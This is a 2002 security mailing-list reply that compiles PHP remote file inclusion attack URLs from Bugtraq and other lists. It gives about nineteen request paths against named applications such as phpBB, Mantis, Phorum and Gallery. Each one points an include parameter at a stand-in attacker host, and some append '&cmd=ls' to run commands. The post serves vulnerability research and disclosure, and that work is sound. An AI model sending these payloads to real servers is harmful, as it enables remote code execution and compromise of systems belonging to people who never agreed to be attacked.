Re: Good practicle php attack example

From: Steven M. Christey (coley@linus.mitre.org)
Date: 09/22/02


Date: Sat, 21 Sep 2002 18:46:16 -0400 (EDT)
From: "Steven M. Christey" <coley@linus.mitre.org>
To: zeno@cgisecurity.com


I used the regular expression in my previous post to grab some
concrete PHP-related URL's from about 4 months' worth of email, which
includes various security mailing lists. Many of these URL's come
from a Bugtraq post by Frog Man in June.

/_head.php?_zb_path=http://attacker.example.com
/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attacker.example.com?
/gallery/captionator.php?GALLERY_BASEDIR=http://attacker.example.com
/globals.php3?LangCookie=http://attacker.example.com
/include/msql.php?inc_dir=http://attacker.example.com&ext=txt
/include/mssql7.php?inc_dir=http://attacker.example.com&ext=txt
/include/mysql.php?inc_dir=http://attacker.example.com&ext=txt
/include/oci8.php?inc_dir=http://attacker.example.com&ext=txt
/include/postgres.php?inc_dir=http://attacker.example.com&ext=txt
/include/postgres65.php?inc_dir=http://attacker.example.com&ext=txt
/install.php?phpbb_root_dir=http://attacker.example.com
/mantis/login_page.php?g_meta_include_file=http://attacker.example.com
/page.php?template=http://your-ip/hello.html?
/phorum/admin/actions/del.php?include_path=http://attacker.example.com&cmd=ls
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://attacker.example.com&cmd=ls
/pollensondage.inc.php?app_path=http://attacker.example.com
/user/agora_user.php?inc_dir=http://attacker.example.com&ext=txt
/user/ldap_example.php?inc_dir=http://attacker.example.com&ext=txt
/userlist.php?ME=http://attacker.example.com

- Steve

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com